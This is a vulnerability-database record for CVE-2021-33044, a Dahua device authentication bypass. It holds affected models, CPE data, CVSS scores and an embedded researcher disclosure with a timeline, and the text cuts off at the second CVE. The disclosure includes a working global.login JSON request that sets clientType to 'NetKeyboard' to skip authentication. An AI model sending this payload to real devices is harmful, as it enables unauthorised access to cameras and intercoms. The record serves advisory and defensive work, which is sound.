"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-1875",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hx5xxx",
"scope": null,
"trust": 1.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx3xxx",
"scope": null,
"trust": 1.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hum7xxx",
"scope": null,
"trust": 1.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hum7xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.820.0000000.5.r.210705"
},
{
"model": "vto-75x95x",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.300.0000003.0.r.210714"
},
{
"model": "vth-542xh",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.500.0000002.0.r.210715"
},
{
"model": "tpc-sd2221",
"scope": "lte",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.7.r.210707"
},
{
"model": "tpc-bf2221",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.10.r.210707"
},
{
"model": "vto-65xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.300.0000004.0.r.210715"
},
{
"model": "sd1a1",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "sd6al",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "sd50",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "sd41",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "tpc-bf5x21",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.8.r.210630"
},
{
"model": "ipc-hx3xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.800.0000000.29.r.210630"
},
{
"model": "tpc-bf1241",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.6.r.210707"
},
{
"model": "tpc-sd8x21",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.9.r.210706"
},
{
"model": "sd22",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "ipc-hx5xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.820.0000000.18.r.210705"
},
{
"model": "sd52c",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "tpc-bf5x01",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.12.r.210707"
},
{
"model": "tpc-pt8x21b",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.10.r.210701"
},
{
"model": "sd22",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "tpc-bf1241",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd6al",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd41",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd50",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd1a1",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd52c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-asi7213y-v3-t1",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-sd2221",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd52c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-sd8x21",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd6al",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-pt8x21b",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-bf2221",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd49",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd1a1",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd50",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "vth542xh",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-bf5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx5 xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-bf1241",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd22",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "vto65xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx1xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "vto75x95x",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "build time but 2021 year 6 versions older than month"
},
{
"model": "ipc",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx3xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "hx5xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "hum7xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "vto75x95x versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "vto65xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "vth542xh versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "ptz dome camera sd1a1 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd22 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd49 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd50 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd52c versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd6al versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "thermal tpc-bf1241 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-bf2221 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-sd2221 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-bf5xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-sd8x21 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-pt8x21b versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.820.0000000.5.r.210705",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.800.0000000.29.r.210630",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.820.0000000.18.r.210705",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd1a1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd1a1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd22_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd22:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd41_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd41:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf1241_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.6.r.210707",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf1241:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf2221_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.10.r.210707",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf2221:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf5x01_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.12.r.210707",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf5x01:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-pt8x21b_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.10.r.210701",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-pt8x21b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-sd2221_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.630.0000000.7.r.210707",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-sd2221:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-sd8x21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.9.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-sd8x21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.300.0000004.0.r.210715",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.300.0000003.0.r.210714",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.500.0000002.0.r.210715",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf5x21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.8.r.210630",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf5x21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bashis",
"sources": [
{
"db": "PACKETSTORM",
"id": "164423"
}
],
"trust": 0.1
},
"cve": "CVE-2021-33044",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2021-33044",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "High",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 7.6,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2024-000007",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-103421",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "CNVD-2021-70816",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-33044",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-000007",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-33044",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "IPA",
"id": "JVNDB-2024-000007",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-103421",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2021-70816",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-1080",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis \u003cmcw noemail eu\u003e (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R\u0026D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n[Example]\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"loginType\": \"Direct\",\n \"clientType\": \"NetKeyboard\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"Not Used\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n 